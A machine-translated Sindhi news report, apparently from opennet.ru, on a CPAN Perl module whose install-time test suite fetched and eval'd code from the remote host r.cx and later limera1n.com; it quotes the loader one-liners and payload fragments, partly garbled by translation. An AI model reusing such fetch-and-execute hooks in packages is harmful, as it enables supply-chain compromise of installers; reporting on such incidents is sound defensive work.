CPAN ڊاريڪٽري ذريعي ورهايل پرل پيڪيج ۾ , خودڪار طريقي سان لوڊ ڪرڻ لاء ٺهيل CPAN ماڊلز پرواز تي، خراب ڪوڊ. بدسلوڪي داخل هئي ٽيسٽ ڪوڊ ۾ ، جيڪو 2011 کان وٺي ترسيل آهي.
اهو قابل ذڪر آهي ته قابل اعتراض ڪوڊ لوڊ ڪرڻ بابت سوال پيدا ٿيا واپس 2016 ۾.
بدسلوڪي سرگرمي ٽين پارٽي سرور (http://r.cx:1/) مان ڪوڊ ڊائون لوڊ ڪرڻ ۽ ان تي عمل ڪرڻ جي ڪوشش تي زور ڏئي ٿي جڏهن ماڊل کي انسٽال ڪرڻ وقت شروع ڪيل ٽيسٽ سوٽ جي عمل دوران. اهو فرض ڪيو ويو آهي ته ڪوڊ شروعاتي طور تي خارجي سرور تان ڊائون لوڊ ڪيو ويو خراب نه هو، پر هاڻي درخواست کي ريڊائريڪٽ ڪيو ويو آهي ww.limera1n.com ڊومين، جيڪو ان جي ڪوڊ جو حصو مهيا ڪري ٿو.
فائل ۾ ڊائون لوڊ کي منظم ڪرڻ لاء هيٺ ڏنل ڪوڊ استعمال ڪيو ويندو آهي:
منهنجو $prog = __FILE__؛
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x؛
my $try = `$^X $prog`؛
مخصوص ڪوڊ سبب اسڪرپٽ تي عمل ڪيو وڃي ٿو ، جنهن جي مواد کي لڪير ۾ گھٽايو ويو آهي:
استعمال ڪريو lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
هي اسڪرپٽ لوڊ ڪري ٿو خدمت استعمال ڪندي خارجي ميزبان r.cx کان ڪوڊ (ڪردار ڪوڊ 82.46.99.88 متن سان ملن ٿا "R.cX") ۽ ان کي ايول بلاڪ ۾ عمل ڪري ٿو.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; پرنٽ <$b>؛'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
پيڪنگ ڪرڻ کان پوء، هيٺ ڏنل آخرڪار عمل ڪيو ويو آهي: :
پرنٽ{$b=نئون IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
"؛ قدر واپسي وارننگ $@ جڏهن ته $b؛ 1
مشڪلاتي پيڪيج هاڻي مخزن مان هٽايو ويو آهي. (Perl Authors Upload Server)، ۽ ماڊل ليکڪ جو اڪائونٽ بلاڪ ڪيو ويو آهي. انهي صورت ۾، ماڊل اڃا تائين رهي ٿو MetaCPAN آرڪائيو ۾ ۽ سڌو سنئون MetaCPAN مان انسٽال ڪري سگھجي ٿو ڪجھ افاديت استعمال ڪندي جيئن ته cpanminus. ته پيڪيج وڏي پيماني تي ورهايل نه هو.
بحث ڪرڻ لاء دلچسپ ۽ ماڊيول جي ليکڪ، جنهن ان معلومات کي رد ڪيو ته بدسلوڪي ڪوڊ داخل ڪيو ويو ان کان پوءِ سندس سائيٽ ”r.cx“ کي هيڪ ڪيو ويو ۽ وضاحت ڪئي ته هو صرف مزو وٺي رهيو هو، ۽ perlobfuscator.com استعمال ڪيو ڪجهه لڪائڻ لاءِ نه پر سائيز کي گهٽائڻ لاءِ. ڪوڊ جو ۽ ان جي ڪاپي ڪلپ بورڊ ذريعي آسان ڪرڻ. فنڪشن جو نالو ”بوٽ اسٽريپ“ جو انتخاب ان حقيقت سان بيان ڪيو ويو آهي ته هي لفظ ”بوٽ وانگر لڳي ٿو ۽ بوٽ اسٽريپ کان ننڍو آهي“. ماڊل جي ليکڪ پڻ يقين ڏياريو آهي ته سڃاڻپ ٿيل ڌانڌلي خراب ڪارناما انجام نه ڏيندا آهن، پر صرف TCP ذريعي ڪوڊ جي لوڊشيڊنگ ۽ عمل کي ظاهر ڪن ٿا.
جو ذريعو: opennet.ru